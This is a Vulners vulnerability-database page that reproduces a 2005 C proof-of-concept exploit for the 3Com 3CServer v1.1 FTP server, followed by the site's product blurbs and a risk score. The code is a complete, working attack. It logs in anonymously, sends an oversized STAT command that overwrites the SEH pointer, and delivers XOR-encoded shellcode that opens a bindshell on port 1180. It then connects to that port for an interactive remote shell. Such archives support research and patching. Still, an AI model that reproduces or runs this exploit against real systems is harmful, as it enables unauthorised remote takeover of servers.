Vulners
Lucene search
3CServer 1.1 FTP Server Remote Exploit
/*
subject: Proof of Concept exploit for 3CServer v1.1 FTP server
vendor: 3Com, http://support.3com.com/software/utilities_for_windows_32_bit.htm
`date`: Mon Feb 7 18:10:01 2005
notes: universal offset, SEH ptr overwriting with variation
author: mandragore, mandragore@[email protected]
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define NORM "\033[00;00m"
#define GREEN "\033[01;32m"
#define YELL "\033[01;33m"
#define RED "\033[01;31m"
#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.0 for " RED "3CServer v1.1.007" NORM
#define fatal(x) { perror(x); exit(1); }
#define default_port 21
#define default_user "anonymous"
#define default_pass "[email protected]"
#define GPA 0x0045b968
#define LLA 0x0045b964
#define offset 0x418A19 // call eax
unsigned char bsh[]={
// 198 bytes, iat's gpa at 0x1a, iat's lla at 0x2b, port at 0x46 (1180), key 0xde
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB0,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0x57,0xD7,0x60,0xDE,0xFE,0x9E,0xDE,0xB6,0xED,
0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,0x9E,0xDE,0x49,
0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0xB4,0x90,0x89,0x21,0xC8,0x21,0x0E,
0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xDA,0x42,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0xB4,0xDC,
0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,0x8D,0xB4,0xD3,0x89,0x21,0xC8,0x21,0x0E,0xB4,
0xDE,0x8A,0x8D,0xB4,0xDF,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,
0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,
0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,
0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,
0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,
0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,
0xAE,0xD6,0x21,0xC8,0x21,0x0E
};
char verbose=0;
static void start(void) __attribute__ ((constructor));
void start() {
int gpa=GPA^0xdededede, lla=LLA^0xdededede;
memcpy(bsh+0x1a,&gpa,4);
memcpy(bsh+0x2b,&lla,4);
}
int readcrap(int s) {
struct timeval tv;
fd_set fds;
int ret;
char buff[1024];
FD_ZERO(&fds);
FD_SET(s,&fds);
bzero(buff,sizeof(buff));
while (1) {
tv.tv_sec=1;
tv.tv_usec=0;
if ( ret=select(s+1, &fds, NULL, NULL, (struct timeval *)&tv) < 0 )
break;
if (FD_ISSET(s,&fds)) {
// something to read
if ( read(s,buff,sizeof(buff),0) < 1 )
break;
} else {
// timeout
return 1;
}
}
return 0; // something went bad
}
void usage(char *argv0) {
int i;
printf("%s -d <host/ip> [opts]\n\n",argv0);
printf("Options:\n");
printf(" -h undocumented\n");
printf(" -u user [default: " default_user "]\n");
printf(" -p pass [default: " default_pass "]\n");
printf(" -P <port> for the shellcode [default: 1180]\n");
exit(1);
}
void shell(int s) {
char buff[4096];
int retval;
fd_set fds;
printf("[+] connected!\n\n");
for (;;) {
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(s,&fds);
if (select(s+1, &fds, NULL, NULL, NULL) < 0)
fatal("[-] shell.select()");
if (FD_ISSET(0,&fds)) {
if ((retval = read(1,buff,4096)) < 1)
fatal("[-] shell.recv(stdin)");
send(s,buff,retval,0);
}
if (FD_ISSET(s,&fds)) {
if ((retval = recv(s,buff,4096,0)) < 1)
fatal("[-] shell.recv(socket)");
write(1,buff,retval);
}
}
}
int main(int argc, char **argv, char **env) {
struct sockaddr_in sin;
struct hostent *he;
char *host; int port=default_port;
char *Host; int Port=1180; char bindopt=1;
int i,s;
char *buff, *jmpback="\xe9\x35\xff\xff\xff";
char *user=default_user; char *pass=default_pass;
printf(BANNER "\n");
if (argc==1)
usage(argv[0]);
for (i=1;i<argc;i+=2) {
if (strlen(argv[i]) != 2)
usage(argv[0]);
switch(argv[i][1]) {
case 'd':
host=argv[i+1];
break;
case 'u':
user=argv[i+1];
break;
case 'p':
pass=argv[i+1];
break;
case 'P':
Port=atoi(argv[i+1])?:1180;
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
memcpy(bsh+0x46,&Port,2);
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
break;
case 'v':
verbose++; i--;
break;
case 'h':
usage(argv[0]);
default:
usage(argv[0]);
}
}
if (verbose)
printf("verbose!\n");
if ((he=gethostbyname(host))==NULL)
fatal("[-] gethostbyname()");
sin.sin_family = 2;
sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);
sin.sin_port = htons(port);
printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port);
printf("[.] will try to put a bindshell on port %d.\n",Port);
// -------------------- core
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0)
fatal("[-] connect()");
printf("[+] connected, sending exploit\n");
buff=(char *)malloc(4096);
bzero(buff,4096);
readcrap(s);
sprintf(buff,"USER %s\r\n",user);
send(s,buff,strlen(buff),0);
readcrap(s);
sprintf(buff,"PASS %s\r\n",pass);
send(s,buff,strlen(buff),0);
readcrap(s);
bzero(buff,sizeof(buff));
strcpy(buff,"STAT ");
memset(buff+5,0x41,2000);
memcpy(buff+5+0x571-strlen(bsh),&bsh,strlen(bsh));
memcpy(buff+5+0x571,jmpback,strlen(jmpback));
i=offset;
memcpy(buff+5+0x5d9,&i,4);
send(s,buff,strlen(buff),0);
readcrap(s);
free(buff);
close(s);
// -------------------- end of core
sin.sin_port = htons(Port);
sleep(1);
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0)
fatal("[-] exploit most likely failed");
shell(s);
exit(0);
}
// sebug.net
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Feb 2005 00:00Current
7.1High risk
Vulners AI Score7.1